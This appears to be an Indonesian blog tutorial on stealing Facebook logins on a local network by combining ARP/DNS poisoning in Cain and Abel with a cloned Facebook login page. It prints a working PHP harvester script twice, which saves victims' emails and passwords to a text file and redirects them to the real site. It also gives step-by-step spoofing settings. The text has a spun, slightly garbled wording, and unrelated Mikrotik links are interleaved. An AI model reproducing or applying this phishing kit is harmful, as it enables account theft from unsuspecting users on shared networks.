Sniffing adalah sebuah acara untuk melaksanakan penyadapan, sehingga bila dihubungkan dengan Judul diatas maka tutorial kali ini saya akan membagi pengalaman untuk menyadap Password Facebook memakai Metode Man In The Middle dan Phising. Man In The Middle atau biasa disingkat dengan MITM sendiri yakni sebuah Tekhnik yang dipakai yang kira-kira maksudnya yakni sebuah metode dimana seorang hacker akan berada di jalur antara User dan Host. selanjutnya Phising bermakna sebuah metode untuk medapatkan User Credential memakai akun/halaman palsu sehingga User terkecoh dengan info palsu yang kita gunakan.
Jika merujuk pada judul postingan ini, maka tutorial ini mengajarkan bagaimana anda sanggup mendapat User Credential (Username & Password) dengan cara menipu User untuk masuk ke sebuah situs yang menyerupai dengan Facebook sehingga user tersebut memasukan User Credential nya ke situs palsu yang telah kita buat dan otomatis User Credential tadi tersimpan di dalam sebuah file yang telah kita siapkan sebelumnya.
Semoga bermanfaat bagi anda : Cukup beberapa langkah saja, anda sudah sanggup Mengkonfigurasi Mikrotik
Alur kerja dari Tekhnik/Metode ini kira-kira menyerupai ini, Saat user mengakses sebuah Website kita ambil pola facebook, maka seorang Hacker/Attacker akan melaksanakan Poison (Meracuni) di sebuah jaringan yang berakibat bila ada user yang mengakses situ www.facebook.com maka akan di arahkan Ke Komputer Host lain yang di dalamnya sudah tersimpan halaman Fake Login yang tampilanya menyerupai dengan tampilan Facebook asli. Selanjutnya bila user tersebut melaksanakan proses login di halaman Fake Login tersebut maka data User Credentialnya akan tersimpan otomatis.
Yang Dibutuhkan :
- Cain And Able
- Web Server Seperti XAMPP,WAMPP,AppServ atau yang lainya
- Script Fake Login
Penggunaan Web Server bergotong-royong Optional alias tidak harus, Karena sanggup saja anda memakai Hostingan Sebagai kawasan menyimpan File Fake login anda, namun sebab alasan Efisiensi makanya saya menyarankan anda untuk menciptakan web server Local sendiri memakai Aplikasi tersebut diatas dengan tujuan untuk mempercepat tampilnya halaman Fake Login tanpa harus mengarah ke IP/Komputer Host Online.
Untuk Fake Login Sendiri cara mendapatkanya bergotong-royong cukup mudah yaitu cukup dengan menyimpan halaman Login orisinil dan memodifikasi sedikit perintah PHP nya.
Proses Pembuatan Halaman Fake Login Facebook
$email = $_POST['email'];
$pass = $_POST['pass'];
$text=$_POST["text"];
$file = fopen("hasil.txt","a");
if($file)
{
fputs($file,"\n Email: ".$email);
fputs($file,"\n Password :".$pass);
fputs($file,"\n");
}
fclose($file);
?>
<script language="javascript">document.location.href='http://www.facebook.com';</script>
Proses Poisoning
Proses Pembuatan Halaman Fake Login Facebook
- Buka Situs Facebook
- Save halaman tersebut dengan menekan tombol CTRL + S Dikeyboard anda kemudian beri nama index.html
- Simpan Halaman & Folder yang anda telah download tadi ke directory Webserver anda
- Buat 2 buah file dengan nama tangkap.php dan hasil.txt
- tempatkan 2 file tersebut bersama dengan halaman Facebook yang sudah anda download sebelumnya
- Buka halaman Facebook yang sudah didownload sebelumnya memakai Notepad atau Notepad++
- Edit Action Form login
- Menjadi menyerupai dibawah ini
- Isi isyarat di bawah ini ke dalam file tangkap.php
$email = $_POST['email'];
$pass = $_POST['pass'];
$text=$_POST["text"];
$file = fopen("hasil.txt","a");
if($file)
{
fputs($file,"\n Email: ".$email);
fputs($file,"\n Password :".$pass);
fputs($file,"\n");
}
fclose($file);
?>
<script language="javascript">document.location.href='http://www.facebook.com';</script>
- Silahkan dicoba dahulu dengan mengakses halaman fake login anda dari browser
- Setelah didownload dan diinstall, Buka Cain And Abel
- Klik Start Sniffer (Lingkar Merah)
- Cek IP Komputer Anda
- Pindah Ke Tab Sniffer (Yang saya Blok Berwarna Kuning)
- Klik APR (Lingkar Biru)
- Lalu Klik APR-DNS (Lingkar Merah)
- Klik Tambah (Tombol Plus Lingkar Kuning)
- DNS Name Requested di isi www.facebook.com
- IP Address To Rewrite di isi IP Komputer kita (192.168.0.101)
- Klik OK
- Klik Hosts (Ujung Kiri Bawah, Sebelah APR)
- Klik Kanan dan Pilih Scan MAC Address
- Kembali Ke TAB APR kemudian klik sajian APR
- Klik Tambah (Tombol Plus)
- Lalu Klik OK
- Klik Start/Stop APR (Lingkar Biru)
Selesai. Hasilnya, Jika ada komputer/Laptop/HP di dalam jaringan anda yang ingin mengakses www.facebook.com maka akan di belok kan ke Halaman FaKe Login yang anda simpan di direktori webserver anda, dan otomatis username/email dan password yang di input orang tersebut akan disimpan di dalam File hasil.txt
Just Info : Seperti ini cara konfigurasi supaya Hotspot Mikrotik jalan Bersamaan dengan UseeTv Indihome dalam satu Jaringan Wireless
Sekian Dan terima Kasih :D